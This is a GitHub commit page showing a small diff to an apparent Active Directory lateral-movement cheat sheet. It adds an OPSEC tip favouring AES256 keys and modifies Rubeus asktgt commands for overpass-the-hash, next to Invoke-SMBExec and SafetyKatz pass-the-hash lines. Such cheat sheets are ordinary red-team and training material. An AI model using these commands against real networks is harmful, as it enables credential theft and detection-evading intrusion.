Skip to content

Commit

Permalink
Update Lateral-Movement.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@0xJs
0xJs authored Mar 17, 2022
1 parent 8385b04 commit 81d322e
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions windows-ad/Lateral-Movement.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -106,6 +106,7 @@ Invoke-SMBExec -Target <COMPUTERNAME> -Domain <DOMAIN> -Username <USERNAME> -Has

### Overpass The Hash
- Over Pass the hash (OPTH) generate tokens(kerberos) from hashes or keys. Needs elevation (Run as administrator)
- OPSEC TIP: Use aes256 keys!

#### Calculate NTLM hash
```
Expand All @@ -126,12 +127,12 @@ SafetyKatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS>
#### Rubeus
- Below doesn't need elevation
```
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /ptt
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /domain /nowrap /ptt
```

- Below command needs elevation
```
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

### Double hop
Expand Down

0 comments on commit 81d322e

Please sign in to comment.